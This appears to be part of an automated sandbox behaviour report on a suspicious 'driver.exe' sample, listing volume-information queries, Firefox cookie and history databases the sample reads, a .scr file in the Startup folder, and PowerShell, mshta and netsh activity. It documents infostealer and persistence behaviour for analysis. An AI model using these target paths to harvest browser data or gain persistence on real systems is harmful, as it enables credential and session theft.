Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
